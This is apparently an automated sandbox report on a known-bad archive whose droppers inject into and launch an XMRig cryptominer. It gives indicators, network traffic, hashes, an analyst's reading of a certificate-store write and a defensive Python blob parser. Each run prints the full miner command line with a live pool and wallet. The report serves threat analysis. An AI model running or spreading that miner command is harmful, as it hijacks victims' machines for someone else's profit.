Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 17:07
Signatures
Unsigned PE
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:01
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2540 wrote to memory of 4940 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 888 wrote to memory of 2816 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.98.74.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1796s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1500 wrote to memory of 756 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3176 wrote to memory of 1236 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3176 wrote to memory of 1236 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.192.11.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1236-16-0x000001A8AB3F0000-0x000001A8AB410000-memory.dmp
memory/1236-17-0x000001A8AB430000-0x000001A8AB450000-memory.dmp
memory/1236-{20,24}-0x000001A8AB450000-0x000001A8AB470000-memory.dmp
memory/1236-{21,25}-0x000001A8AB470000-0x000001A8AB490000-memory.dmp
memory/1236-{18,19,22,23,26..84}-0x00007FF795280000-0x00007FF795D83000-memory.dmp (63 snapshots of the same 0xB03000-byte region, consistent with the main image of PID 1236, which is xmrig.exe per the WriteProcessMemory row above)
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:56
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 identical rows; the sandbox rendered no per-hit fields for this signature)
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex value elided; the full Blob written for this thumbprint is shown under behavioral3) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex value elided; second write to the same value) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4588 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4588 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2532-16-0x0000025C85E30000-0x0000025C85E50000-memory.dmp
memory/2532-17-0x0000025C85F80000-0x0000025C85FA0000-memory.dmp
memory/2532-{20,24}-0x0000025C85FA0000-0x0000025C85FC0000-memory.dmp
memory/2532-{21,25}-0x0000025C85FC0000-0x0000025C85FE0000-memory.dmp
memory/2532-{18,19,22,23,26..84}-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp (63 snapshots of the same 0xB03000-byte region, consistent with the main image of PID 2532, which is xmrig.exe per the WriteProcessMemory row above)
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:58
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 identical rows; the sandbox rendered no per-hit fields for this signature)
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex value elided; the full Blob written for this thumbprint is shown under behavioral3) | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex value elided; second write to the same value) | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
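Every run that shows "Modifies system certificate store" (behavioral11, this one, and behavioral3, where the Blob value is reproduced in full) writes the same key, `HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349`. Decoding that Blob is the check a practitioner wants before reading the hit as a rogue root. The Blob is a sequence of CryptoAPI property records; in the behavioral3 value, property 11 decodes to the friendly name "Sectigo (AAA)", property 32 is a 1078-byte DER certificate whose subject bytes read "Comodo CA Limited" / "AAA Certificate Services" with validity 040101000000Z to 281231235959Z, and D1EB23...E349 is the published SHA-1 fingerprint of that public root. AuthRoot is the store that Windows' automatic root update fills on demand, and CryptoAPI does the write inside whichever process triggered the chain build, so a dropper that has just opened TLS to github.com producing this entry is consistent with Windows caching a Sectigo root, not with an attacker-supplied certificate (which would carry a thumbprint outside the Microsoft root program and typically land under ROOT rather than AuthRoot). The parser below is an added example, not sandbox output and not Microsoft code: it decodes the record format, extracts the stored hashes and friendly name, and cross-checks SHA-1(certificate) against both the stored hash property and the registry key name. Its sample input is the first nine records of the behavioral3 Blob copied from this report (the certificate record is omitted for length, so the cross-check reports None for it); the round-trip builder and the TEST_DER bytes are constructed for the example.

```python
"""Decode a CryptoAPI certificate "Blob" registry value.

Added example for this report; it is not sandbox output and not Microsoft
code. The Blob under HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\<store>\\
Certificates\\<SHA-1> is a sequence of property records, each laid out as
<property id: u32 LE> <reserved: u32 LE, always 1> <length: u32 LE> <data>.
Property ids are the CERT_*_PROP_ID constants from wincrypt.h.
"""
import hashlib
import struct
from typing import Dict, Optional

PROP_NAMES = {
    3: "CERT_SHA1_HASH_PROP_ID",
    9: "CERT_ENHKEY_USAGE_PROP_ID",
    11: "CERT_FRIENDLY_NAME_PROP_ID",
    15: "CERT_SIGNATURE_HASH_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    25: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    29: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    32: "CERT_CERT_PROP_ID",                      # the DER-encoded certificate
    83: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
    98: "CERT_AUTH_ROOT_SHA256_HASH_PROP_ID",
}

# First nine records of the behavioral3 "Set value (data)" Blob, copied from this
# report. The tenth record (id 32, the 1078-byte DER certificate) is left out for
# length, so thumbprint_consistent() returns None for this input.
REPORT_BLOB_PREFIX_HEX = (
    "1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2"
    "030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349"
    "1d00000001000000100000002e0d6875874a44c820912e85e964cfdb"
    "140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4"
    "0b000000010000001c0000005300650063007400690067006f002000280041004100410029000000"
    "620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"
    "53000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0"
    "301b060567810c010330123010060a2b0601040182373c0101030200c0"
    "090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a0304"
    "06082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308"
    "0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286"
)


def parse_cert_blob(blob: bytes) -> Dict[int, bytes]:
    """Split a serialized certificate context into {property id: raw bytes}."""
    props: Dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"record at offset {off} has reserved field {reserved}, expected 1")
        off += 12
        data = blob[off:off + length]
        if len(data) != length:
            raise ValueError(f"property {prop_id} declares {length} bytes, only {len(data)} present")
        props[prop_id] = data
        off += length
    return props


def friendly_name(props: Dict[int, bytes]) -> Optional[str]:
    """CERT_FRIENDLY_NAME_PROP_ID is a NUL-terminated UTF-16LE string."""
    raw = props.get(11)
    return raw.decode("utf-16-le").rstrip("\x00") if raw else None


def thumbprint_consistent(props: Dict[int, bytes], key_name: str) -> Optional[bool]:
    """Does SHA-1 of the embedded certificate match both the stored SHA-1 property and
    the registry key name? None when the blob carries no certificate record."""
    der = props.get(32)
    if der is None:
        return None
    actual = hashlib.sha1(der).hexdigest()
    return actual == props.get(3, b"").hex() and actual == key_name.lower()


def summarize(props: Dict[int, bytes]) -> Dict[str, str]:
    """Analyst view: property names, decoded friendly name, certificate size, raw hashes."""
    out: Dict[str, str] = {}
    for pid, data in props.items():
        name = PROP_NAMES.get(pid, f"CERT_PROP_ID_{pid}")
        if pid == 11:
            out[name] = friendly_name(props) or ""
        elif pid == 32:
            out[name] = f"DER certificate, {len(data)} bytes"
        else:
            out[name] = data.hex()
    return out


def build_cert_blob(der: bytes, name: str) -> bytes:
    """Serialize a minimal context (SHA-1, SHA-256, friendly name, certificate) in the
    same record format; constructed here so the parser can be round-trip tested."""
    def record(pid: int, data: bytes) -> bytes:
        return struct.pack("<III", pid, 1, len(data)) + data
    return (record(3, hashlib.sha1(der).digest())
            + record(98, hashlib.sha256(der).digest())
            + record(11, (name + "\x00").encode("utf-16-le"))
            + record(32, der))


TEST_DER = b"\x30\x03\x02\x01\x05"   # constructed stand-in for a certificate


def self_check() -> bool:
    """Round trip: build a blob for TEST_DER, parse it, confirm the SHA-1 cross-check passes."""
    props = parse_cert_blob(build_cert_blob(TEST_DER, "Example Root"))
    return thumbprint_consistent(props, props[3].hex().upper()) is True and friendly_name(props) == "Example Root"


if __name__ == "__main__":
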